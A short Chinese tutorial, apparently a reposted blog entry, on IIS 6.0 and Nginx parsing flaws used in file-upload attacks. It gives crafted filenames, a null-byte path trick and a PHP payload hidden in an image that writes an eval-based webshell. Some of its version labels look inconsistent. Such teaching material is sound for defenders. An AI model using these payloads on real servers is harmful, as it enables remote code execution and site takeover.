51. 檔案上傳篇——IIS解析漏洞原理
阿新 • • 發佈:2019-02-02
目錄解析
當建立“*asp、*asa”格式的資料夾時,其目錄下的任意檔案都將會被IIS當做ASP檔案來解析。
例如:建立資料夾parsing.asp,在parsing.asp資料夾下新建一個文字檔案test.txt,其內容為<%=now()%>,然後在瀏覽器中訪問,會發現test.txt會被當做ASP檔案執行,在瀏覽器頁面輸出當前時間!
檔案解析
當檔案為“.asp;1.jpg”時,分號後面的不被解析。IIS6.0同樣會以ASP指令碼方式來執行!
例如:建立檔案test.asp;1.jpg,內容為<%=now()%>,將會在瀏覽器頁面輸出當前時間。
IIS 7.0/7.5/Nginx<8.3畸形解析漏洞
Nginx解析漏洞是我國安全組織80sec發現的!
在預設Fast-CGI開啟的狀況下,黑客上傳一個名字為wooyun.jpg,內容為
<?php fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd]?)’);?>
的檔案,然後訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬shell.php
Nginx<8.03空位元組程式碼執行漏洞
影響版本:0.5,0.6,0.7<=0.7.65,0.8<=0.8.37
Nginx在圖片中嵌入PHP程式碼然後通過訪問 xxx.php%00.jpg 來執行其中的程式碼